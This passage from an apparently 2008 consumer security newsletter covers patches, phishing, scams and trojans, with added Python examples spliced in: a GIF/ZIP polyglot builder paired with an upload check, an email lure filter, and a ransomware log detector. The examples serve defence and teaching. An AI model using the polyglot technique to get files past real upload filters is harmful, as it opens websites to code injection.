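    """What many upload handlers do: look only at the leading magic bytes."""
    return data[:6] in (b"GIF87a", b"GIF89a")


def is_also_archive(data: bytes) -> bool:
    """True when a ZIP reader would open the very same bytes as an archive.
    zipfile searches for the end-of-central-directory record from the end of
    the file, exactly as the Java runtime does, so prepended data is ignored."""
    return zipfile.is_zipfile(io.BytesIO(data))


def archive_members(data: bytes) -> list:
    """List the entries a ZIP/JAR reader would extract from the hybrid."""
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        return archive.namelist()


def accept_upload(data: bytes) -> bool:
    """Hardened check: a file that looks like an image AND parses as an
    archive is rejected, whatever its extension or Content-Type claims."""
    return passes_naive_image_check(data) and not is_also_archive(data)


if __name__ == "__main__":
    # The member name and content are placeholders, not a real applet.
    hybrid = make_gifar(TINY_GIF, "payload.class", b"\xca\xfe\xba\xbe")
    print("naive image check passes:", passes_naive_image_check(hybrid))
    print("also opens as ZIP/JAR:   ", is_also_archive(hybrid), archive_members(hybrid))
    print("hardened check accepts:  ", accept_upload(hybrid))
    print("plain GIF accepted:      ", accept_upload(TINY_GIF))
```

Note that checking only whether the upload ends with the GIF trailer byte (0x3B) is not enough: a ZIP end-of-central-directory record may carry an arbitrary comment, so an attacker can make the archive end with that byte too. Asking "does a ZIP reader accept this file?" is the check that matches how the attack actually works.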
Possible Back Door Built Into Skype
According to reports, there may be a back door built into Skype, which allows connections to be bugged. Skype has declined to
expressly deny the allegations.
At a meeting with representatives of ISPs and the Austrian regulator on lawful interception of IP based services held on 25th June,
high-ranking officials at the Austrian interior ministry revealed that it is not a problem for them to listen in on Skype
conversations. This has been confirmed by a number of the parties present at the meeting.
Skype declined to give a detailed response to specific enquiries as to whether Skype contains a back door and whether specific
clients allowing access to a system or a specific key for decrypting data streams exist. There has long been speculation that
Skype may contain a back door.
Because the vendor has not revealed details of its proprietary Skype protocol or of how the client works, questions as to what
else Skype is capable of and what risks are involved in deploying it in an enterprise environment remain open.
Apple Wins! (Or NOT)
Apple has achieved the dubious honor of having the most reported vulnerabilities of any vendor. Microsoft, the reigning
champion for many years, has actually fallen to 3rd place behind the open source content management system Joomla.
The final results were very close according to the IBM X-Force 2008 mid-year report: Apple accounted for 3.2 percent of
disclosed vulnerabilities, followed by Joomla with 2.7 percent and Microsoft at 2.5 percent.
Another Apple Update
Apple has released Security Update 2008-005 to address multiple vulnerabilities that affect a number of applications. These
vulnerabilities may allow an attacker to conduct DNS cache poisoning attacks, execute arbitrary code, cause a denial-of-service
condition, or access the affected system with elevated privileges. Please note that this update addresses recent issues with
weaknesses in common DNS implementations; see Vulnerability Note VU#800113 for additional information.
International Phone Scam
A resident agent in charge of the Knoxville office of the U.S. Secret Service said some 8 to 10 areas of the country were
targeted recently by an international organized crime group. The organized crime group, the official said, routed recorded
messages to U.S. phone numbers through an Iowa telephone company where the group had leased a block of telephone numbers.
For instance, thousands of residents in one county received telephone calls on Wednesday night and Thursday morning that claimed to
be from a local bank and warned the recipients that their bank cards had been canceled. The recorded messages directed
people to call a Des Moines, Iowa, telephone number, supposedly to get their bank cards reinstated. When that number was called,
residents heard another recorded message that directed them to key in their bank account numbers and PINs.
The Secret Service agent also noted that the bank's own records were not compromised by the scam. He said the criminals did
not obtain telephone numbers of local residents from the bank. Instead, he said, the criminals apparently used computer software
to sequentially dial many telephone numbers in the same area code on Wednesday and Thursday. That, he said, is why many people
who had no banking relationship with the local bank received the automated telephone calls.
One of the other areas affected by a similar scam was in central Missouri, according to an article posted on the Web site of
KRCG in Jefferson City, Missouri. The July 18 article said Central Bank there had been targeted in the same fashion as
the case cited above.
Be aware of these types of scams and be sure to warn your vulnerable friends and relations.
******************************************************************************************************************
Newsletter Posted 07/25/2008
New Version of Mozilla Thunderbird E-Mail Client Released
The Mozilla Thunderbird e-mail client has just been updated to address eight security issues.
If you use Thunderbird as your email client you should update to version 2.0.0.16.
Researcher Warns of Unpatched iPhone Bugs
Security vulnerabilities in the iPhone’s e-mail application and Safari Web browser can be used by phishers to dupe users into
visiting malicious sites or by spammers to flood the phone’s in-box with junk mail, a researcher warned today.
The browser vulnerability researcher said he reported three separate bugs to Apple Inc. about two weeks ago: two in the iPhone
Mail program and one in its Safari browser.
Apple has acknowledged that the two vulnerabilities in Mail are security issues, he said, but the company is currently undecided
on whether the Safari flaw meets its security bug criteria. At times, Apple has balked at labeling problems as security
vulnerabilities, notably in May, when it initially said the so-called “carpet bomb” bug was not security-related.
If you have an Apple iPhone, be aware of these vulnerabilities and watch this list and Apple for the release of an
update.
Many Malicious Programs Represent Themselves as Antispyware or Antivirus Programs
It's worth reminding everyone: there is a large category of malicious programs that present themselves as antispyware or
antivirus programs. Having already established that they will lie about these things, they may lie about others. For instance, we
recently came across one which claims to have won a number of awards, including the PC Magazine Editors' Choice.
The site that this fraudulent email pointed to appeared to include malicious graphics in an ad that looks like a fairly standard
antimalware product advertisement. It also includes a number of award logos, including PC Magazine's Editors' Choice Award and
Best of 2005. For the record, PC Magazine assures us they won neither of those awards.
This site and the fake program you can download from it are written up by Symantec as malicious. They make no claim that it
does anything malicious in the sense of infection or spreading itself. Instead they say that once you download and install it,
it makes exaggerated claims of threats present on the computer. "The user is then prompted to pay for a full license of the
application in order to remove the errors."
To tell the fake from the real thing, once you have the name of a product, simply search for it on Google or some other
major search engine. You should quickly notice lots of pages tagging it as malicious.
Fabricated News of Car Accident Used to Distribute Trojan
Fabricated news of a supposed car accident involving Formula One star Fernando Alonso is being used to distribute a new banking
Trojan.
The fake news story, supposedly from the Spanish daily El Pais, has the two-time motor racing champion seriously injured on Tuesday in an
accident in the northern city of Bilbao. The bogus story, distributed via spam emails, links to a video clip depicting what
appears to be a spectacular blaze. The clip installs malware onto the PC of those falling for the ruse.
The malware is identified by Spanish anti-virus firm Panda Security as Banker-LGC. "This is not the first time we have seen this
piece of news used to spread malware though, as a few weeks ago we saw a very similar one, the major difference was that it was
trying to install a Gaobot worm instead," notes Luis Corrons, technical director of PandaLabs.
Virus writers, who often latch onto real news events, also resort to making up fake news. At the start of the month one such
attack claimed that the Third World War had begun in an attempt to spread another Trojan.
Planting key-stroke logging software onto compromised PCs sits alongside the use of phishing attacks as a means for hackers to
gain access to online banking accounts. Traditionally, phishing emails attempted to dupe prospective marks into visiting a website
under the control of hackers and handing over their account credentials.
Dozens of Pierce County, WA Bank Accounts Drained in Debit Card Scam
Dozens of victims have come forward after their bank accounts were drained by thieves. At least 75 people fell victim to a
scam by simply using their debit card at a gas station and detectives expect many more reports to come in. Over the Fourth of
July weekend, a highly organized group using stolen debit card information withdrew thousands of dollars from Pierce County,
Washington, citizens’ bank accounts.
The information was obtained by using electronic skimming machines placed on gas pumps at an ARCO gas Station in Pierce County.
Detectives believe the information was stolen in August 2007. Almost a year later, the information was used at multiple banks to
withdraw thousands of dollars from each account.
This was done over the three-day weekend to avoid detection. The card numbers and PINs were captured at the station and later
used at ATMs throughout the King County area. Most card losses are around $1,200, but some are much higher, up to $4,000,
depending on account balance or overdraft rules.
If anyone has used that ARCO station during that time frame, they should contact their financial institution and get a
new card issued.
Vishing Attacks Increase
The IC3 (the FBI's online fraud reporting website) has received multiple reports of different variations of a scheme known as
"vishing" (voice phishing, in which the lure arrives by telephone call or text message rather than by email). These attacks
against U.S. financial institutions and consumers continue to rise at an alarming rate.
A new version recently reported involved the sending of text messages to cell phones claiming the recipient’s on-line bank account
has expired. The message instructs the recipient to renew their on-line bank account by using the link provided. Due to rapidly
evolving criminal methodologies, it is impossible to include every scenario.
Be aware of this scam and protect your PII (personally identifiable information, such as social security numbers, credit
card or bank account information, etc). Beware of e-mails, telephone calls, or text messages requesting your PII and warn your
vulnerable friends and relations.
DNS Cache Poisoning Exploit In the Wild - Affecting Sprint Servers
A very serious problem with DNS servers is now being exploited in the wild. We have known about this issue for a while and the
major vendors of DNS servers have issued patches, but there are millions of these servers out there and many of them have not
yet been patched.
DNS, the Domain Name System, is like the post office of the Internet. DNS servers take the URL or web site name that you type
into your browser and translate it into the correct address to make your connection. Those addresses are kept in tables (called
a cache) on all of those millions of DNS servers worldwide, so when you type in a web site name, that name is sent to one of those
servers, which looks up the correct Internet Protocol (IP) address to connect you to.
If a hacker can succeed in poisoning that cache and inserting their own false IP addresses into the cache, they can direct you to
fake web sites. These sites may look exactly like the real ones, but in fact they are stuffed full of malware and will attempt to
infect your computer.
We have learned today that the Sprint servers are vulnerable to this exploit. There may be other major providers of DNS service
that are affected.
Be aware of this threat and watch for more news of affected services. If you use Sprint modems to connect to the Internet
you should avoid doing any financial or other sensitive web browsing using that service, until they have patched their systems.
******************************************************************************************************************
Newsletter Posted 07/17/2008
Mozilla Foundation has released updates for Firefox
Updates are now available for the Firefox web browser (version 2.x and 3.x) to address a vulnerability that occurs when the browser is launched
from the command line. Updates also address a pair of critical vulnerabilities that have been written about recently. These last two
vulnerabilities were part of the Safari "carpet bomb" bug that created a "blended" threat to Microsoft Windows users who had
both Apple Inc.'s Safari browser and Firefox installed on the same system as well as Internet Explorer.
If you use Firefox, you should immediately update your browser to the latest version.
Opera Patches Their Browser
Opera Software ASA has patched the newest version of their browser software (version 9.5) for the first time to fix several flaws.
The update patches bugs in the Windows, Mac OS X and Linux editions.
If you use Opera, you should immediately update your browser to version 9.5.1.
Apple Issues Security Update for Mac OS X
Apple has released the fourth security update this year for its Mac OS X operating system. This patches 25 vulnerabilities, nearly
half of them considered critical. It also updated Safari for the Mac.
If you are running Mac OS X, you should immediately update to version 10.5.4.
Zone Alarm Update Released
Zone Alarm has released a new version to address an issue in the way the latest Microsoft Security Bulletin affected Zone Alarm.
UPS Warns of Fake E-mails with Real Virus
United Parcel Service (UPS) issued a warning Tuesday about fake UPS e-mails that have a real computer virus attached. The e-mails
claim to be from “UPS Packet Service” and state that the person receiving the e-mail sent a parcel that could not be delivered
because of an incorrect address. The e-mail instructs the reader to open an attachment that contains a copy of the invoice. The
attachment, though, instead contains a virus that can wreak havoc on a computer, according to comments posted on the Yahoo!
Answers Web site.
In a notice posted on its Web site, UPS said it is aware of the fake e-mail and recommends that anyone receiving
it delete it without opening the attachment.
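The fake UPS messages above and the airline e-ticket messages in the 10/09/2008 newsletter share one shape: a plausible subject line and a ZIP attachment that hides an executable. As an added example written for this newsletter (not code from the page, Sophos or UPS), here is a small Python filter that parses a message and reports reasons to quarantine it on either signal. The subject regex assumes that the X's in "E-Ticket#XXXXXXXXXX" stand for digits; the sample messages, addresses, file names and archive contents are all constructed.

```python
import io
import re
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage

# Subject pattern from the reports: "E-Ticket#" followed by a run of characters
# shown as X's. Assumption: those are digits.
ETICKET_SUBJECT = re.compile(r"^\s*E-?Ticket\s*#\s*\d+\s*$", re.IGNORECASE)

# Extensions Windows runs directly when the file is double-clicked.
EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js")


def build_sample(malicious: bool = True) -> bytes:
    """Constructed test messages (not real captures)."""
    msg = EmailMessage()
    msg["From"] = "reservations@airline.invalid"
    msg["To"] = "traveller@example.invalid"
    if malicious:
        archive = io.BytesIO()
        with zipfile.ZipFile(archive, "w") as z:
            # The archive member is a placeholder, not a real dropper.
            z.writestr("eTicket#1234.pdf.exe", b"MZ placeholder")
        msg["Subject"] = "E-Ticket#1234567890"
        msg.set_content("Your e-ticket is attached. Open the file to print it.")
        msg.add_attachment(archive.getvalue(), maintype="application",
                           subtype="zip", filename="eTicket#1234.zip")
    else:
        msg["Subject"] = "Your itinerary for 14 July"
        msg.set_content("Your itinerary is attached as plain text.")
        msg.add_attachment("Flight 123 departs 09:00", filename="itinerary.txt")
    return msg.as_bytes()


def flag_message(raw: bytes) -> list:
    """Return the reasons a message should be quarantined (empty list = clean)."""
    msg = message_from_bytes(raw, policy=policy.default)
    reasons = []

    subject = str(msg.get("Subject", ""))
    if ETICKET_SUBJECT.match(subject):
        reasons.append("subject matches e-ticket lure: %r" % subject)

    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        lower = name.lower()
        # Double extensions such as "eTicket.pdf.exe" still end in .exe.
        if lower.endswith(EXEC_EXT):
            reasons.append("directly executable attachment: %s" % name)
            continue
        if lower.endswith(".zip"):
            payload = part.get_payload(decode=True) or b""
            if not zipfile.is_zipfile(io.BytesIO(payload)):
                reasons.append("attachment named .zip is not a ZIP file: %s" % name)
                continue
            # Look inside the archive rather than trusting its name.
            with zipfile.ZipFile(io.BytesIO(payload)) as z:
                execs = [n for n in z.namelist() if n.lower().endswith(EXEC_EXT)]
            if execs:
                reasons.append("archive %s contains executable(s): %s"
                               % (name, ", ".join(execs)))
    return reasons


if __name__ == "__main__":
    for reason in flag_message(build_sample(malicious=True)):
        print("QUARANTINE:", reason)
    print("benign message reasons:", flag_message(build_sample(malicious=False)))
```

The subject check catches this week's lure only; the archive check is the durable part, because every variant of these campaigns has to deliver something the user can run.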
Attackers Target Zero-day Microsoft Word Bug
Microsoft reports a new vulnerability that affects only Word 2002, Service Pack 3. At this point Microsoft
believes this is not affecting other Word versions, but they are still investigating and others could in fact be affected.
For the attack to work a user must open a malicious e-mail attachment or visit a rogue website that hosts the exploit.
Successful exploitation could let the criminals run programs of their choosing on your computer.
Until a patch is released, be careful not to open any Word attachments that you did not expect to receive. If you receive a
Word document that you think is possibly legitimate, take a moment to contact the sender to verify that they sent it.
New Trojan Targeting Multimedia Files
There is a new Trojan in the wild that targets multimedia files. When you attempt to run one of these infected files you are prompted
to install a new codec (an application to help play the multimedia file). This "codec" is in fact a trojan that embeds malware into
multimedia files on your computer (such as MP3, WMA music files, WMV video files, etc.).
When the user plays any of these infected files, no sign of the compromise will show up so you will not know you've been infected.
This new Trojan is now detected by most antivirus signature files. Make sure your antivirus is actively running
and all signature files are up to date.
Homer Simpson Spreading Malware
A malware research director at FaceTime has reported that a Simpsons screen name is sending auto-reply messages promising a
special exclusive episode of the show available for download. The link in the message leads to an executable file. On launching
the Trojan, the user is presented with a fake error message followed by several real error messages and finally a blank screen. On
restarting, the user's system will run noticeably slower and be prone to crashes. The malicious payload includes a rootkit and
remote control software that enrolls the user's machine in a botnet.
Again, make sure your antivirus is running and is up to date. And don't trust email from Homer Simpson!
US Military Actions Used to Spread Malware
We are seeing a new wave of spam messages that announce an alleged attack of the U.S. Army against Iran in order to trick users
into downloading and installing malicious software onto their personal computers. The webpage hosting the piece of malware –
dailydotnews.com – is a simple, yet efficiently designed site with a top banner, a simple picture masquerading as a YouTube player
and three lines of text detailing the U.S. operation in Iran. This spam approach is used on a large scale, as the spammer relies on a
catchy heading and a link to the piece of malware in order to fuel users' curiosity and trick them into downloading the piece of
malware. “The new spam wave relies on computer users’ curiosity regarding the conflict between the United States and Iran. Users
are redirected to a fake news website, where they are shown a larger, inciting description accompanied by a movie player,” said a
BitDefender Spam analyst. “However, the alleged flash movie is an image depicting a movie player; when clicked, the image gives
users a ‘Save image as’ option.” Upon clicking on either the “movie” or the top banner, the user starts the download process of a
piece of malware, called “iran_occupation.exe.” The file contains the same malicious code infecting the user with the Storm Worm.
The authors have used timing to their advantage, as the recent tensions in the Middle East between the U.S. and Iran have been
escalating.
We are seeing many new varieties of this type of fraudulent email or website recently. All of them use the same tactics - using current events
or fake headlines to induce users to open a web site or download an attachment.
Be vigilant and skeptical of any of these types of emails or headlines - and remind your vulnerable friends and relations
to be aware of these types of scams.
******************************************************************************************************************
Newsletter Posted 06/27/2008
Adobe Reader Update Needed (AGAIN!)
It's become almost a weekly experience to hear that Adobe Reader has a new bug that needs to be dealt with. This week it's another
JavaScript method problem that allows remote attackers to call restricted functions on your computer and take it over. We are
hearing reports of this vulnerability being actively exploited.
You should immediately update your Adobe Reader software to version 8.1.2 Security Update 1.
Mozilla Firefox Vulnerability
The Mozilla Firefox browser has a new vulnerability that will allow a remote user to execute arbitrary code on a target computer.
No solution was available as of this posting.
If you are running Mozilla Firefox at home you should have automatic updates turned on. If you don't, you should check
regularly for patches and apply them as soon as they are available.
DNS Trojan Hacks Home Routers
We've had reports this week of a new trojan that hacks into home wireless routers and changes their DNS settings. DNS is like
an address book that tells the router where to look for the actual Internet Protocol (IP) address when you type in a URL (like
www.amazon.com). If the bad guys mess with your DNS settings they can tell your router to connect you up to their servers instead
of the legitimate servers you are looking for. So when you type www.amazon.com you are directed to a hacker's server that may
look exactly like amazon.com but in fact is attacking your computer as soon as you connect.
The new trojan also indirectly affects every computer that connects through the compromised router, because they all rely on
the router for DNS. Home wireless routers are often easy prey for hackers because home users don't know how, or don't care, to
lock them down. Of course no one reading this newsletter would ever have an insecure wireless router...
Make sure your antivirus is up to date and if you are running a wireless network at home, check out our 'Wireless Network
Security Guidelines' (link in the left pane), and make sure your router is secured.
Voice Over IP (VOIP) Phone Vulnerabilities
Avaya, Cisco and Nortel VOIP phones have newfound vulnerabilities that would allow remote code execution, unauthorized access,
denial of service, or information harvesting. The vulnerabilities affect voice servers (VOIP PBXes) and softphone software that
runs on laptops or desktops.
If you use any of these types of VOIP phones, you should look for patches to be made available soon by the vendors.
Internet Travel Scam
This scam involves a website called Tickets2cheap.com boasting the lowest airfares in the world, believed to be run out of South
Africa. The company asks for payment through cash remittance agencies. When the money is received the fraudsters use stolen
credit cards to purchase the tickets. Often those credit cards have been cancelled by the time the traveller is ready to travel
and the tickets are no longer valid.
We do not recommend sending cash or using cash remittance agencies unless you have done a very thorough check of the veracity and
legitimacy of any company you do business with.
Mac OS X Vulnerabilities
In the last week or so we have seen several reports of new trojans and vulnerabilities aimed at the Mac OS X operating system. Apple
maintains that these are not a real problem yet, but we are seeing reports of their being actively exploited.
If you are running Mac OS X at home, make sure your antivirus is up to date and watch for any new updates from Apple -
apply them as soon as they are available.
Apple Safari for Windows Fix
Microsoft and Apple argued over who was at fault for awhile, but now Apple has released a fix for a security issue in their
Safari browser for Windows.
If you use the Safari browser for Windows you should update it to version 3.1.2 as soon as possible.
******************************************************************************************************************
Newsletter Posted 06/12/2008
This was our first newsletter in this format.
QuickTime Update
Apple has released an important update to its media player QuickTime that fixes several dangerous media processing errors. These
could be exploited by sending users malformed media files to cause buffer overflows and other problems that would allow
criminals to gain complete control of victims' computers.
If you have QuickTime on your computer you should immediately upgrade to version 7.5.
Microsoft Patch Tuesday
Microsoft released seven new security updates on Tuesday 6/10, three of which it rated as critical.
If you are running Microsoft Windows at home you should have automatic updates turned on. If you don't, you need to
go to Internet Explorer, click on Tools, and click on Microsoft Update to get these latest patches.
Open Office Security Update
Open Office is an open source office suite that includes a word processor, spreadsheet application, etc. If you are running this
application on your home computer, please be aware that there is a new vulnerability that is addressed in its latest update.
If you are running Open Office, you should immediately update to version 2.4.1.
Blackmailing Trojan
In a new and much more nefarious version of a nasty malware attack, we are seeing a trojan that encrypts all of the .bak (backup),
.doc (Word documents), .jpg (pictures), and .pdf (Adobe documents) on your hard drive and deletes the originals. It then erases
itself after leaving a small read me text file on your computer that tells you where you can "buy" a decryption tool.
Kaspersky Lab, an antivirus vendor and research team, refers to this as the latest in "ransomware". It is basically an extortion
scheme.
Your best defense against this type of attack is to backup your personal and important files regularly to separate and
external media such as an external hard drive or CD/DVD's that do not remain connected to your computer. It is also important to
ensure that your antivirus applications are up to date.
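As an added example written for this newsletter, not something from the page or from Kaspersky Lab, here is a small Python detector that looks for the behaviour described above in a file-activity log: a burst of deletions of .bak/.doc/.jpg/.pdf files by a single process, together with a dropped README-style text file. The log format, the ".locked" names given to the encrypted copies, the process IDs, the paths and the thresholds are all constructed assumptions; real endpoint telemetry will differ, but the per-process burst-plus-note logic carries over.

```python
from collections import defaultdict

# Extensions the trojan described above goes after.
TARGET_EXT = (".bak", ".doc", ".jpg", ".pdf")

# Constructed file-activity log, not real telemetry: "<seconds> <pid> <op> <path>".
# pid 4120 behaves like the trojan (write encrypted copy, delete original, drop a
# note); pid 1888 is an ordinary program saving a document. The ".locked" suffix
# is an assumption; the page does not say what the encrypted copies are called.
SAMPLE_LOG = r"""
100 4120 CREATE C:\Users\amy\Documents\budget.doc.locked
101 4120 DELETE C:\Users\amy\Documents\budget.doc
102 4120 CREATE C:\Users\amy\Pictures\beach.jpg.locked
103 4120 DELETE C:\Users\amy\Pictures\beach.jpg
104 4120 CREATE C:\Users\amy\Documents\taxes.pdf.locked
105 4120 DELETE C:\Users\amy\Documents\taxes.pdf
106 4120 CREATE C:\Users\amy\Documents\notes.doc.locked
107 4120 DELETE C:\Users\amy\Documents\notes.doc
108 4120 CREATE C:\Backups\mail.bak.locked
109 4120 DELETE C:\Backups\mail.bak
110 4120 CREATE C:\Users\amy\Pictures\dog.jpg.locked
111 4120 DELETE C:\Users\amy\Pictures\dog.jpg
112 4120 CREATE C:\Users\amy\Desktop\README.txt
113 4120 DELETE C:\Users\amy\AppData\Local\Temp\dropper.exe
300 1888 DELETE C:\Users\amy\Documents\draft.doc
301 1888 CREATE C:\Users\amy\Documents\draft.doc
"""


def parse_log(text: str) -> list:
    """Turn the constructed log into (timestamp, pid, op, path) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, op, path = line.split(maxsplit=3)
        events.append((int(ts), int(pid), op.upper(), path))
    return events


def suspicious_processes(events: list, min_deletes: int = 5, window: int = 60) -> dict:
    """Heuristic (ours, not the vendor's): flag any process that deletes at
    least `min_deletes` target-extension files inside some `window`-second
    span, and report whether it also dropped a README-style text file, the
    ransom note described above."""
    deletes = defaultdict(list)
    dropped_note = set()
    for ts, pid, op, path in events:
        name = path.lower().rsplit("\\", 1)[-1]
        if op == "DELETE" and name.endswith(TARGET_EXT):
            deletes[pid].append(ts)
        elif op == "CREATE" and name.endswith(".txt") and "readme" in name:
            dropped_note.add(pid)

    hits = {}
    for pid, times in deletes.items():
        times.sort()
        # Sliding window: largest number of target deletions within `window` seconds.
        best = start = 0
        for i, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            best = max(best, i - start + 1)
        if best >= min_deletes:
            hits[pid] = {"deletes_in_window": best, "ransom_note": pid in dropped_note}
    return hits


if __name__ == "__main__":
    for pid, info in suspicious_processes(parse_log(SAMPLE_LOG)).items():
        print("pid %d: %d target files deleted in one window, ransom note dropped: %s"
              % (pid, info["deletes_in_window"], info["ransom_note"]))
```

The burst threshold is what separates the trojan from a user who deletes a document now and then; the note check adds confidence but is not required, since a variant might name its note differently. Detection after the fact does not recover the files, which is why the offline backup advice above is the real defence.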
Bank Social Engineering attacks
We have heard reports from several areas in the country recently of massive attacks on a particular bank or credit union. These
attacks use email, phone and even texting and regular mail to inundate customers and non-customers of a certain institution
with solicitations that ask the receiver to call a number to learn about recent activity on their bank account, or warn of
fraud attempts against the bank with links to a security prevention program.
It is likely that we may see a similar attack scheme in our area, so be aware and warn those of your friends and families that
might be vulnerable.
FBI and British Government Bogus e-mails
In the latest of this type of email scam using official government logos, the FBI is warning about fake e-mails purporting to
be from the FBI's Internet Fraud Complaint Center and the British government. The new scam claims to involve a reimbursement of
funds lost from Internet fraud.
The fake notice informs recipients, “The approved committees have approved the sum of $35,000.00 (Thirty five thousand dollars)
for your scam compensations the bank of England [sic] will be contacting you soon to remit the approved amount to your account.”
The scam notice indicates that failure to comply will place the funds on hold and a penalty will be applied to the recipient’s bank
account.
Be aware of this type of scam. The FBI does not use email to contact victims of phishing schemes or fraud.
"What a Stupid Face Your have here [insert your name]"
This particularly pleasant email phishing scam seems to get past some anti-phishing filters by using popular domains such as
att.com and earthlink.com and real user names.
The virus that it delivers locks up your computer and puts crawling cockroaches all over your screen. More annoying than
destructive as far as we've been able to tell, but it may just be a test to see how many people will respond to this interesting
subject line. I guess when someone tells you they have something with a "stupid face" and your own name in the subject, it is
hard to resist, as we've seen this SPAM proliferate expansively in the last few days.
If you receive an email like this, just delete it. If you see it in your filtered SPAM list, do not open it or have it
delivered.
----------------------------------------
Last Updated: October 9, 2008
Website Contact: David Matthews